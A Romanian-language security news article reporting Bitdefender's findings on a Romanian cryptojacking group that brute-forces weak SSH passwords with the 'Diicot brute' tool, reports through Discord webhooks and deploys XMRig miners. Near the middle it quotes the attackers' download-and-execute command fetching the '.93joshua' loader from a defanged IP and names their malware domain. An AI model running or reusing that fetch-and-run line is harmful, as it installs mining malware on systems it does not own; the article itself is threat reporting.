O bandă de cryptojacking urmărită în România

de | iulie 20, 2021 | Știri de securitate cibernetică

O grupare de cryptojacking despre care se crede că are sediul în România folosește un nou program de brute-forcer SSH (Secure Shell Protocol) numit „Diicot brute” pentru a sparge parolele de pe dispozitive bazate pe Linux cu parole slabe.

Cercetătorii de la Bitdefender au declarat într-un raport publicat miercuri că scopul principal al campaniei a fost de a implementa programe malware de minare de cryptomonede Monero. Însă, kitul bandei le permite să încerce și alte tipuri de atacuri. Cercetătorii au declarat că au stabilit legături între grup și cel puțin două rețele botnet de negare a serviciului distribuit (DDoS): o variantă a rețelei botnet DDoS DemonBot bazată pe Linux, denumită „Chernobyl”, și o rețea botnet Perl IRC.

Poate vă întrebați de ce au ales cryptojackingul; pentru că este o scurtătură pentru a ajunge la „pradă”. Conform raportului:

„După cum știți cu toții, mineritul pentru cryptomonede este lent și plictisitor, dar poate merge mai repede atunci când se folosesc mai multe sisteme. Deținerea mai multor sisteme pentru minerit nu este ieftină, așa că atacatorii încearcă, în schimb. următorul lucru foarte bun: să compromită de la distanță dispozitive și să le folosească pentru minerit.”

Credențiale slabe pe dispositivele Linux

Nu este nicio surpriză atunci când vorbim despre parole slabe; prin urmare, numele de utilizator și parolele implicite, sau credențialele slabe pe care hackerii le pot sparge cu ușurință prin brute-force, reprezintă un fenomen semnificativ și nefericit în domeniul securității cibernetice.

Cercetătorii menționați în raport au precizat că nu este neobișnuit ca hackerii să urmărească credențialele SSH slabe; cu toate acestea, partea complicată nu este neapărat forțarea brută a credențialelor, ci mai degrabă „a face acest lucru într-un mod care să le permită atacatorilor să nu fie detectați”.

Autorul instrumentului Diicot brute a susținut că acesta poate filtra honeypot-urile, explică analiștii. S-ar putea să fie așa, dar „această investigație este o dovadă că nu este așa, sau că cel puțin nu a putut să ne ocolească pe noi”, au punctat analiștii.

Datele honeypot ale Bitdefender, o companie românească de tehnologie de securitate informatică, arată că atacurile care corespund semnăturii acestui instrument de brute-force au început în ianuarie. Cu toate acestea, ei au spus că această campanie nu a răspândit însă viermele în sistemul infectat, cel puțin nu încă:

„Adresele IP de la care provin aparțin unui set relativ mic, ceea ce ne spune că operatorii amenințării nu folosesc încă sisteme compromise pentru a propaga malware-ul (comportament de vierme).”

Grupul a fost localizat în România

După ce a analizat instrumentele și metodele sale, Bitdefender a descoperit grupul de amenințări, inclusiv o mare confuzie de scripturi Bash (shell-ul de autentificare implicită pentru mai multe distribuții Linux) asamblate cu un compilator de scripturi shell (shc). De asemenea, hackerii au folosit Discord pentru a raporta informațiile, o metodă din ce în ce mai populară folosită de atacatori.

Fraudele rău intenționate ale instrumentelor de colaborare, cum ar fi Slack și Discord, pentru a eluda securitatea și pentru a livra furturi de date, troieni cu acces de la distanță (RAT) și alte programe malware au crescut. De exemplu, legat de abuzul de aplicații de colaborare, în aprilie, echipa de securitate cibernetică Talos de la Cisco a raportat că la o singură căutare în rețeaua Discord a găsit 20.000 de rezultate cu viruși.

Utilizând Discord, hackerii realizează câteva lucruri: îi scutește pe atacatori de necesitatea de a-și găzdui propriul server C2 (comandă și control), deoarece webhooks (mesaje automate trimise de aplicații atunci când se întâmplă ceva) sunt modalități de a posta date pe canalul Discord prin programare, a explicat raportul. În plus, Discord prezintă datele colectate pentru o vizualizare relevantă pe un canal.

„Discord este din ce în ce mai popular în rândul jucătorilor implicați în amenințări datorită acestei funcționalități, care oferă involuntar sprijin pentru distribuția de malware (utilizarea CDN-ului său), C2 (webhooks) sau crearea de comunități centrate pe cumpărarea și vânzarea de cod sursă și servicii malware (de exemplu, DDoS)”, se arată în articol.

Aceste informații pot permite, de asemenea, ca actorii de amenințări să evalueze performanța instrumentelor lor în ceea ce privește infectarea mașinilor. Asemănător, lista de victime poate fi ulterior scanată pentru a găsi potențiale ținte pentru exploit-urile unor alte atacuri..

Ce a determinat urmărirea cryptojacking-ului?

Investigația grupului a început în luna mai, când analiștii au descoperit o campanie de cryptojacking cu ajutorul încărcătorului „.93joshua”. Analiștii au observat că:

„S-a dovedit că serverul găzduia alte fișiere. Deși grupul a ascuns multe dintre aceste fișiere, includerea lor în alte scripturi a relevat prezența lor.”

De asemenea, au descoperit că domeniul asociat, mexalz.us, a găzduit programe malware „cel puțin din februarie”.

cryptojacking
Sursă: Bitdefender

Instrumente de cryptojacking accesibile

Se poate concluziona pe baza datelor furnizate de Bitdefender că programul de brute-force este distribuit pe modelul „as-a-service”, având în vedere că utilizează un server API centralizat. Atacatorii care închiriază instrumentul furnizează cheia API în scripturile lor, urmând raportul. Iar pentru realizarea acestui fapt, intervine conexiunea cu România, explică raportul:

„La fel ca majoritatea celorlalte instrumente din acest kit, instrumentul de brute-force are interfața redactată într-un amestec de limba română și engleză. Acest lucru ne face să credem că autorul său face parte din același grup românesc.”

Cercetătorii au spus că grupul a fost activ cel puțin din anul 2020.

Atacuri în serie

Înainte de a-și disimula urmele prin tehnici precum ascunderea în spatele Discord, cryptojackerii trebuie mai întâi să găsească credențiale slabe, ceea ce reușesc prin scanare. Cercetătorii au declarat că atacatorii de cryptojacking, în acest caz. au găzduit mai multe fișiere pe server, inclusiv jack.tar.gz, juanito.tar.gz, scn.tar.gz și skamelot.tar.gz.

Arhivele conțineau secvențe cu instrumente pentru spargerea serverelor cu credențiale SSH slabe, un proces care include următoarele etape:

  • Recunoaștere: identificarea serverelor SSH prin scanarea porturilor și capturarea de bannere;
  • Accesul la credențiale: identificarea credențialelor valide prin brute-force;
  • Accesul inițial: conectarea prin SSH și executarea conținutului util al infectării.

Hackerii au folosit instrumentele „ps” și „masscan” pentru recunoaștere, au explicat analiștii, în timp ce „99x/haiduc” (ambele malware Outlaw) și „brute” sunt folosite pentru accesarea credențialelor și accesul inițial. În afară de instrumentele tradiționale, precum „masscan” și „zmap”, setul de instrumente al autorilor amenințărilor a inclus în acest caz un instrument de forțare brută SSH, Diictot brute, care nu a fost raportat anterior și care a fost scris în Go.

Campania (încă activă) include utilizarea „skamelot.tar.gz”, care conține următoarele fișiere:

  • r (script compilat de SHC) parcurge clasele IP și rulează Go;
  • Go (script compilat de SHC) rulează 99x (haiduc) cu conținutul util al infectării;
  • p este o listă de credențialelor încercate.

Potrivit analiștilor, fișierul cu încărcătura utilă este încă online, dar atacatorii l-au mutat pe mexalz.us (din curl -O http://45[.]32[.]112[.]68/.sherifu/.93joshua && chmod 777 .93joshua && ./.93joshua && uname -a). Grupul folosește, de asemenea, binare compilate la comandă cu configurații încorporate ale unui miner legitim numit XMRig; un miner open-source adaptat în trecut pentru cryptojacking.

Brute Force este încă în funcțiune

Tehnica brute-foce nu ar funcționa dacă nu ar exista parole slabe, care oferă operatorilor de amenințări o modalitate ușoară de a prelua controlul asupra dispozitivelor, au observat cercetătorii: „Oamenii sunt simplul motiv pentru care tehnica brute-force a credențialelor SSH încă funcționează.”

Analiștii au găsit, de asemenea, acel instrument, Diicot brute, în arhivele jack.tar.gz și juanito.tar.gz. Spre deosebire de majoritatea instrumentelor folosite de Mexalz, acesta nu poate fi folosit de unul singur; prin urmare, este menit să fie închiriat pe un model SaaS (Software as a service).

Cryptojacking funcționează cu tehnici de forță brută
Prima pagină a site-ului mexalz.us; Sursa: Bitdefender

Atacatorii refolosind același dispozitiv au condus la o urmărire mai ușoară

Joseph Carson, cercetător șef în domeniul securității și consultant CISO la firma de securitate Thycotic Centrify, a declarat că, în termeni relativi, această campanie nu este atât de complicată, în ciuda utilizării unui nou instrument de brute-force.

„Tehnicile folosite au fost publicate prea des pe darknet, ceea ce face ca oricine cu un computer și o conexiune la internet să poată începe cu ușurință o campanie de cryptojacking”.

Joseph Carson a spus că ceea ce ajută la depistarea acestor grupuri este faptul că ele folosesc tehnicile și metodele lor preferate.

„Atunci când sunt utilizate suficient de des, acestea creează o amprentă digitală comună care poate fi folosită pentru a te urmări digital. Cei care sunt dificil de urmărit sunt cei care se ascund în spatele unui cod furat sau care nu refolosesc niciodată aceleași metode și tehnici.”

Pentru fiecare nouă campanie, ei fac ceva complet diferit, a spus Carson. Dar, de obicei, acești atacatori sunt „bine finanțați și dispun de resurse”.

„Cei mai mulți infractori cibernetici vor alege calea cea mai ușoară și anume să reutilizeze multe instrumentele și tehnicile deja existente. Va depinde cu adevărat dacă atacatorului îi pasă de faptul că va fi descoperit sau nu.”

În opinia lui Joseph. cu cât un atacator ia mai multe măsuri pentru a rămâne ascuns „tinde să însemne că operează într-o țară în care ar putea fi urmărit penal dacă ar fi descoperit”!

Atribuire

Infografic vector creat de fullvector – www.freepik.com

by Laura Bandoiu

Nu există niciun motiv pentru a amâna instruirea angajaților.

Solicitați o ofertă bazată pe nevoile organizației dvs. și începeți să construiți o infrastructură puternică de securitate cibernetică chiar astăzi.